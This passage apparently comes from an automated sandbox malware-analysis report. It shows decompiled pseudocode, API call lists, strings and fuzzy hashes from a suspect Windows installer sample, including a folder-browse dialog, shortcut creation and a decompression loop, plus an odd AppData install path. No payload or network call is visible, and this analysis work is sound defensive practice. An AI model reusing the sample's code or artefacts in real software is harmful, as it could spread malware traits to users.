                                                            				signed int _t96;
                                                            				int _t109;
                                                            				signed char _t114;
                                                            				signed int _t118;
                                                            				struct HWND__** _t122;
                                                            				intOrPtr* _t138;
                                                            				CHAR* _t146;
                                                            				unsigned int _t150;
                                                            				signed int _t152;
                                                            				unsigned int _t156;
                                                            				signed int _t158;
                                                            				signed int* _t159;
                                                            				signed char* _t160;
                                                            				struct HWND__* _t165;
                                                            				struct HWND__* _t166;
                                                            				int _t168;
                                                            				unsigned int _t197;
                                                            
                                                            				_t156 = __edx;
                                                            				_t82 =  *0x438068; // 0x720a3c
                                                            				_v32 = _t82;
                                                            				_t146 = ( *(_t82 + 0x3c) << 0xd) + 0x453000;
                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                            				if(_a8 == 0x40b) {
                                                            					E00405951(0x3fb, _t146);
                                                            					E00406535(_t146);
                                                            				}
                                                            				_t166 = _a4;
                                                            				if(_a8 != 0x110) {
                                                            					L8:
                                                            					if(_a8 != 0x111) {
                                                            						L20:
                                                            						if(_a8 == 0x40f) {
                                                            							L22:
                                                            							_v8 = _v8 & 0x00000000;
                                                            							_v12 = _v12 & 0x00000000;
                                                            							E00405951(0x3fb, _t146);
                                                            							if(E00405CD7(_t185, _t146) == 0) {
                                                            								_v8 = 1;
                                                            							}
                                                            							E00406257(0x434060, _t146);
                                                            							_t87 = E00406663(1);
                                                            							_v16 = _t87;
                                                            							if(_t87 == 0) {
                                                            								L30:
                                                            								E00406257(0x434060, _t146);
                                                            								_t89 = E00405C82(0x434060);
                                                            								_t158 = 0;
                                                            								if(_t89 != 0) {
                                                            									 *_t89 =  *_t89 & 0x00000000;
                                                            								}
                                                            								if(GetDiskFreeSpaceA(0x434060,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t168 = 0x400;
                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                            									asm("cdq");
                                                            									_v48 = _t109;
                                                            									_v44 = _t156;
                                                            									_v12 = 1;
                                                            									goto L36;
                                                            								}
                                                            							} else {
                                                            								_t159 = 0;
                                                            								if(0 == 0x434060) {
                                                            									goto L30;
                                                            								} else {
                                                            									goto L26;
                                                            								}
                                                            								while(1) {
                                                            									L26:
                                                            									_t114 = _v16(0x434060,  &_v48,  &_v28,  &_v40);
                                                            									if(_t114 != 0) {
                                                            										break;
                                                            									}
                                                            									if(_t159 != 0) {
                                                            										 *_t159 =  *_t159 & _t114;
                                                            									}
                                                            									_t160 = E00405C30(0x434060);
                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                            									_t159 = _t160 - 1;
                                                            									 *_t159 = 0x5c;
                                                            									if(_t159 != 0x434060) {
                                                            										continue;
                                                            									} else {
                                                            										goto L30;
                                                            									}
                                                            								}
                                                            								_t150 = _v44;
                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                            								_v44 = _t150 >> 0xa;
                                                            								_v12 = 1;
                                                            								_t158 = 0;
                                                            								__eflags = 0;
                                                            								L35:
                                                            								_t168 = 0x400;
                                                            								L36:
                                                            								_t95 = E00404BFA(5);
                                                            								if(_v12 != _t158) {
                                                            									_t197 = _v44;
                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                            										_v8 = 2;
                                                            									}
                                                            								}
                                                            								if( *((intOrPtr*)( *0x44e3fc + 0x10)) != _t158) {
                                                            									E00404BE2(0x3ff, 0xfffffffb, _t95);
                                                            									if(_v12 == _t158) {
                                                            										SetDlgItemTextA(_a4, _t168, 0x434050);
                                                            									} else {
                                                            										E00404B1D(_t168, 0xfffffffc, _v48, _v44);
                                                            									}
                                                            								}
                                                            								_t96 = _v8;
                                                            								 *0x4524c4 = _t96;
                                                            								if(_t96 == _t158) {
                                                            									_v8 = E0040140B(7);
                                                            								}
                                                            								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                            									_v8 = _t158;
                                                            								}
                                                            								E004042F6(0 | _v8 == _t158);
                                                            								if(_v8 == _t158 &&  *0x43c080 == _t158) {
                                                            									E004046BF();
                                                            								}
                                                            								 *0x43c080 = _t158;
                                                            								goto L53;
                                                            							}
                                                            						}
                                                            						_t185 = _a8 - 0x405;
                                                            						if(_a8 != 0x405) {
                                                            							goto L53;
                                                            						}
                                                            						goto L22;
                                                            					}
                                                            					_t118 = _a12 & 0x0000ffff;
                                                            					if(_t118 != 0x3fb) {
                                                            						L12:
                                                            						if(_t118 == 0x3e9) {
                                                            							_t152 = 7;
                                                            							memset( &_v76, 0, _t152 << 2);
                                                            							_v80 = _t166;
                                                            							_v72 = 0x43c090;
                                                            							_v60 = E00404AB7;
                                                            							_v56 = _t146;
                                                            							_v68 = E004062EA(_t146, 0x43c090, _t166, 0x436068, _v12);
                                                            							_t122 =  &_v80;
                                                            							_v64 = 0x41;
                                                            							__imp__SHBrowseForFolderA(_t122);
                                                            							if(_t122 == 0) {
                                                            								_a8 = 0x40f;
                                                            							} else {
                                                            								__imp__CoTaskMemFree(_t122);
                                                            								E00405BE9(_t146);
                                                            								_t125 =  *((intOrPtr*)( *0x452430 + 0x11c));
                                                            								if( *((intOrPtr*)( *0x452430 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") {
                                                            									E004062EA(_t146, 0x43c090, _t166, 0, _t125);
                                                            									if(lstrcmpiA(0x44a3c0, 0x43c090) != 0) {
                                                            										lstrcatA(_t146, 0x44a3c0);
                                                            									}
                                                            								}
                                                            								 *0x43c080 =  *0x43c080 + 1;
                                                            								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                            							}
                                                            						}
                                                            						goto L20;
                                                            					}
                                                            					if(_a12 >> 0x10 != 0x300) {
                                                            						goto L53;
                                                            					}
                                                            					_a8 = 0x40f;
                                                            					goto L12;
                                                            				} else {
                                                            					_t165 = GetDlgItem(_t166, 0x3fb);
                                                            					if(E00405C56(_t146) != 0 && E00405C82(_t146) == 0) {
                                                            						E00405BE9(_t146);
                                                            					}
                                                            					 *0x44e3f8 = _t166;
                                                            					SetWindowTextA(_t165, _t146);
                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                            					_push(1);
                                                            					E004042D4(_t166);
                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            					_push(0x14);
                                                            					E004042D4(_t166);
                                                            					E00404309(_t165);
                                                            					_t138 = E00406663(8);
                                                            					if(_t138 == 0) {
                                                            						L53:
                                                            						return E0040433B(_a8, _a12, _a16);
                                                            					} else {
                                                            						 *_t138(_t165, 1);
                                                            						goto L8;
                                                            					}
                                                            				}
                                                            			}














































                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 004047B5
                                                            • SetWindowTextA.USER32(00000000,?), ref: 004047DF
                                                            • SHBrowseForFolderA.SHELL32(?,00436068,?), ref: 00404890
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040489B
                                                            • lstrcmpiA.KERNEL32(Call,0043C090,00000000,?,?), ref: 004048CD
                                                            • lstrcatA.KERNEL32(?,Call), ref: 004048D9
                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048EB
                                                              • Part of subcall function 00405951: GetDlgItemTextA.USER32 ref: 00405964
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040658D
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659A
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659F
                                                              • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            • GetDiskFreeSpaceA.KERNEL32(00434060,?,?,0000040F,?,00434060,00434060,?,00000001,00434060,?,?,000003FB,?), ref: 004049A9
                                                            • MulDiv.KERNEL32 ref: 004049C4
                                                              • Part of subcall function 00404B1D: lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                              • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
                                                              • Part of subcall function 00404B1D: SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: <r$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Call$`@C
                                                            • API String ID: 2624150263-2160697206
                                                            • Opcode ID: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction ID: 1e5cde7c6216eed5206fee0a992a61c18a0705ae5e449ea6cb8cf0fac14b4d51
                                                            • Opcode Fuzzy Hash: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction Fuzzy Hash: 74A16EB1A00209ABDB11AFA6CD41BAF77B8AF84314F10847BF601B62D1D77C99418F6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 74%
                                                            			E00402173() {
                                                            				signed int _t55;
                                                            				void* _t59;
                                                            				intOrPtr* _t63;
                                                            				intOrPtr _t64;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr* _t67;
                                                            				intOrPtr* _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr* _t73;
                                                            				intOrPtr* _t75;
                                                            				intOrPtr* _t78;
                                                            				intOrPtr* _t80;
                                                            				intOrPtr* _t82;
                                                            				intOrPtr* _t84;
                                                            				int _t87;
                                                            				intOrPtr* _t95;
                                                            				signed int _t105;
                                                            				signed int _t109;
                                                            				void* _t111;
                                                            
                                                            				 *(_t111 - 0x38) = E00402C39(0xfffffff0);
                                                            				 *(_t111 - 0xc) = E00402C39(0xffffffdf);
                                                            				 *((intOrPtr*)(_t111 - 0x88)) = E00402C39(2);
                                                            				 *((intOrPtr*)(_t111 - 0x34)) = E00402C39(0xffffffcd);
                                                            				 *((intOrPtr*)(_t111 - 0x78)) = E00402C39(0x45);
                                                            				_t55 =  *(_t111 - 0x18);
                                                            				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                            				_t105 = _t55 & 0x00008000;
                                                            				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                            				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                            				if(E00405C56( *(_t111 - 0xc)) == 0) {
                                                            					E00402C39(0x21);
                                                            				}
                                                            				_t59 = _t111 + 8;
                                                            				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
                                                            				if(_t59 < _t87) {
                                                            					L15:
                                                            					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                            					_push(0xfffffff0);
                                                            				} else {
                                                            					_t63 =  *((intOrPtr*)(_t111 + 8));
                                                            					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
                                                            					 *((intOrPtr*)(_t111 - 8)) = _t64;
                                                            					if(_t64 >= _t87) {
                                                            						_t67 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                                                            						if(_t105 == _t87) {
                                                            							_t84 =  *((intOrPtr*)(_t111 + 8));
                                                            							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes");
                                                            						}
                                                            						if(_t109 != _t87) {
                                                            							_t82 =  *((intOrPtr*)(_t111 + 8));
                                                            							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                                                            						}
                                                            						_t69 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                                                            						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                                                            						if( *_t95 != _t87) {
                                                            							_t80 =  *((intOrPtr*)(_t111 + 8));
                                                            							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                                                            						}
                                                            						_t71 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                                                            						_t73 =  *((intOrPtr*)(_t111 + 8));
                                                            						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                                                            						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                            							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                                                            							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x2000) != 0) {
                                                            								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                                                            								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                                                            							}
                                                            						}
                                                            						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                                                            						 *((intOrPtr*)( *_t75 + 8))(_t75);
                                                            					}
                                                            					_t65 =  *((intOrPtr*)(_t111 + 8));
                                                            					 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                            					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                                                            						_push(0xfffffff4);
                                                            					} else {
                                                            						goto L15;
                                                            					}
                                                            				}
                                                            				E00401423();
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t111 - 4));
                                                            				return 0;
                                                            			}


                                                            APIs
                                                            • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?), ref: 004021F8
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00002000,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00402238
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 123533781-4054825685
                                                            • Opcode ID: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction ID: de46d6ec528c0b0c8935217740d64446ab711007b8cbb855df2cc617b58c6e92
                                                            • Opcode Fuzzy Hash: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction Fuzzy Hash: 37511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E004027AA(char __ebx, char* __edi, char* __esi) {
                                                            				void* _t19;
                                                            
                                                            				if(FindFirstFileA(E00402C39(2), _t19 - 0x1d0) != 0xffffffff) {
                                                            					E004061B5(__edi, _t6);
                                                            					_push(_t19 - 0x1a4);
                                                            					_push(__esi);
                                                            					E00406257();
                                                            				} else {
                                                            					 *__edi = __ebx;
                                                            					 *__esi = __ebx;
                                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
                                                            				return 0;
                                                            			}





                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 41d340d0e0decd5c5240f79b51cbacb9949563f63550bc6cd14aca042e9f64a0
                                                            • Instruction ID: 399c6a6cf60972f2d7a512407c1446c7d57098f317d76a59d8a1514aa82d2ac6
                                                            • Opcode Fuzzy Hash: 41d340d0e0decd5c5240f79b51cbacb9949563f63550bc6cd14aca042e9f64a0
                                                            • Instruction Fuzzy Hash: 51F0A072608144ABD710EBA49A49AEEB7689F52324F60447BF142B20C2D7B889449B3A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E00406AA8(signed int __ebx, signed int* __esi) {
                                                            				signed int _t396;
                                                            				signed int _t425;
                                                            				signed int _t442;
                                                            				signed int _t443;
                                                            				signed int* _t446;
                                                            				void* _t448;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					_t446 = __esi;
                                                            					_t425 = __ebx;
                                                            					if( *(_t448 - 0x34) == 0) {
                                                            						break;
                                                            					}
                                                            					L55:
                                                            					__eax =  *(__ebp - 0x38);
                                                            					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            					__ecx = __ebx;
                                                            					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            					__ebx = __ebx + 8;
                                                            					while(1) {
                                                            						L56:
                                                            						if(__ebx < 0xe) {
                                                            							goto L0;
                                                            						}
                                                            						L57:
                                                            						__eax =  *(__ebp - 0x40);
                                                            						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                            						__ecx = __eax;
                                                            						__esi[1] = __eax;
                                                            						__ecx = __eax & 0x0000001f;
                                                            						if(__cl > 0x1d) {
                                                            							L9:
                                                            							_t443 = _t442 | 0xffffffff;
                                                            							 *_t446 = 0x11;
                                                            							L10:
                                                            							_t446[0x147] =  *(_t448 - 0x40);
                                                            							_t446[0x146] = _t425;
                                                            							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                            							L11:
                                                            							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                            							_t446[0x26ea] =  *(_t448 - 0x30);
                                                            							E00407217( *(_t448 + 8));
                                                            							return _t443;
                                                            						}
                                                            						L58:
                                                            						__eax = __eax & 0x000003e0;
                                                            						if(__eax > 0x3a0) {
                                                            							goto L9;
                                                            						}
                                                            						L59:
                                                            						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                            						__ebx = __ebx - 0xe;
                                                            						_t94 =  &(__esi[2]);
                                                            						 *_t94 = __esi[2] & 0x00000000;
                                                            						 *__esi = 0xc;
                                                            						while(1) {
                                                            							L60:
                                                            							__esi[1] = __esi[1] >> 0xa;
                                                            							__eax = (__esi[1] >> 0xa) + 4;
                                                            							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                            								goto L68;
                                                            							}
                                                            							L61:
                                                            							while(1) {
                                                            								L64:
                                                            								if(__ebx >= 3) {
                                                            									break;
                                                            								}
                                                            								L62:
                                                            								if( *(__ebp - 0x34) == 0) {
                                                            									goto L182;
                                                            								}
                                                            								L63:
                                                            								__eax =  *(__ebp - 0x38);
                                                            								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            								__ecx = __ebx;
                                                            								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            								__ebx = __ebx + 8;
                                                            							}
                                                            							L65:
                                                            							__ecx = __esi[2];
                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                            							__ebx = __ebx - 3;
                                                            							_t108 = __ecx + 0x408408; // 0x121110
                                                            							__ecx =  *_t108;
                                                            							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                            							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                            							__ecx = __esi[1];
                                                            							__esi[2] = __esi[2] + 1;
                                                            							__eax = __esi[2];
                                                            							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                            							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                            								goto L64;
                                                            							}
                                                            							L66:
                                                            							while(1) {
                                                            								L68:
                                                            								if(__esi[2] >= 0x13) {
                                                            									break;
                                                            								}
                                                            								L67:
                                                            								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                            								__eax =  *_t119;
                                                            								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                            								_t126 =  &(__esi[2]);
                                                            								 *_t126 = __esi[2] + 1;
                                                            							}
                                                            							L69:
                                                            							__ecx = __ebp - 8;
                                                            							__edi =  &(__esi[0x143]);
                                                            							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                            							__eax = 0;
                                                            							 *(__ebp - 8) = 0;
                                                            							__eax =  &(__esi[3]);
                                                            							 *__edi = 7;
                                                            							__eax = E0040727F( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                            							if(__eax != 0) {
                                                            								L72:
                                                            								 *__esi = 0x11;
                                                            								while(1) {
                                                            									L180:
                                                            									_t396 =  *_t446;
                                                            									if(_t396 > 0xf) {
                                                            										break;
                                                            									}
                                                            									L1:
                                                            									switch( *((intOrPtr*)(_t396 * 4 +  &M004071D7))) {
                                                            										case 0:
                                                            											L101:
                                                            											__eax = __esi[4] & 0x000000ff;
                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                            											__eax = __esi[5];
                                                            											__esi[2] = __esi[5];
                                                            											 *__esi = 1;
                                                            											goto L102;
                                                            										case 1:
                                                            											L102:
                                                            											__eax = __esi[3];
                                                            											while(1) {
                                                            												L105:
                                                            												__eflags = __ebx - __eax;
                                                            												if(__ebx >= __eax) {
                                                            													break;
                                                            												}
                                                            												L103:
                                                            												__eflags =  *(__ebp - 0x34);
                                                            												if( *(__ebp - 0x34) == 0) {
                                                            													goto L182;
                                                            												}
                                                            												L104:
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                            												__ecx = __ebx;
                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            												__ebx = __ebx + 8;
                                                            												__eflags = __ebx;
                                                            											}
                                                            											L106:
                                                            											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                            											__ecx = __esi[2];
                                                            											__eax = __esi[2] + __eax * 4;
                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                            											__ecx =  *__eax & 0x000000ff;
                                                            											__eflags = __ecx;
                                                            											if(__ecx != 0) {
                                                            												L108:
                                                            												__eflags = __cl & 0x00000010;
                                                            												if((__cl & 0x00000010) == 0) {
                                                            													L110:
                                                            													__eflags = __cl & 0x00000040;
                                                            													if((__cl & 0x00000040) == 0) {
                                                            														goto L125;
                                                            													}
                                                            													L111:
                                                            													__eflags = __cl & 0x00000020;
                                                            													if((__cl & 0x00000020) == 0) {
                                                            														goto L9;
                                                            													}
                                                            													L112:
                                                            													 *__esi = 7;
                                                            													goto L180;
                                                            												}
                                                            												L109:
                                                            												__esi[2] = __ecx;
                                                            												__esi[1] = __eax;
                                                            												 *__esi = 2;
                                                            												goto L180;
                                                            											}
                                                            											L107:
                                                            											__esi[2] = __eax;
                                                            											 *__esi = 6;
                                                            											goto L180;
                                                            										case 2:
                                                            											L113:
                                                            											__eax = __esi[2];
                                                            											while(1) {
                                                            												L116:
                                                            												__eflags = __ebx - __eax;
                                                            												if(__ebx >= __eax) {
                                                            													break;
                                                            												}
                                                            												L114:
                                                            												__eflags =  *(__ebp - 0x34);
                                                            												if( *(__ebp - 0x34) == 0) {
                                                            													goto L182;
                                                            												}
                                                            												L115:
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                            												__ecx = __ebx;
                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            												__ebx = __ebx + 8;
                                                            												__eflags = __ebx;
                                                            											}
                                                            											L117:
                                                            											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                            											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                            											__ecx = __eax;
                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                            											__ebx = __ebx - __eax;
                                                            											__eflags = __ebx;
                                                            											__eax = __esi[4] & 0x000000ff;
                                                            											__esi[3] = __esi[4] & 0x000000ff;
                                                            											__eax = __esi[6];
                                                            											__esi[2] = __esi[6];
                                                            											 *__esi = 3;
                                                            											goto L118;
                                                            										case 3:
                                                            											L118:
                                                            											__eax = __esi[3];
                                                            											while(1) {
                                                            												L121:
                                                            												__eflags = __ebx - __eax;
                                                            												if(__ebx >= __eax) {
                                                            													break;
                                                            												}
                                                            												L119:
                                                            												__eflags =  *(__ebp - 0x34);
                                                            												if( *(__ebp - 0x34) == 0) {
                                                            													goto L182;
                                                            												}
                                                            												L120:
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                            												__ecx = __ebx;
                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            												__ebx = __ebx + 8;
                                                            												__eflags = __ebx;
                                                            											}
                                                            											L122:
                                                            											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                            											__eax = __eax &  *(__ebp - 0x40);
                                                            											__ecx = __esi[2];
                                                            											__eax = __esi[2] + __eax * 4;
                                                            											__ecx =  *(__eax + 1) & 0x000000ff;
                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                            											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                            											__ecx =  *__eax & 0x000000ff;
                                                            											__eflags = __cl & 0x00000010;
                                                            											if((__cl & 0x00000010) == 0) {
                                                            												L124:
                                                            												__eflags = __cl & 0x00000040;
                                                            												if((__cl & 0x00000040) != 0) {
                                                            													goto L9;
                                                            												}
                                                            												L125:
                                                            												__esi[3] = __ecx;
                                                            												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                            												__esi[2] = __eax;
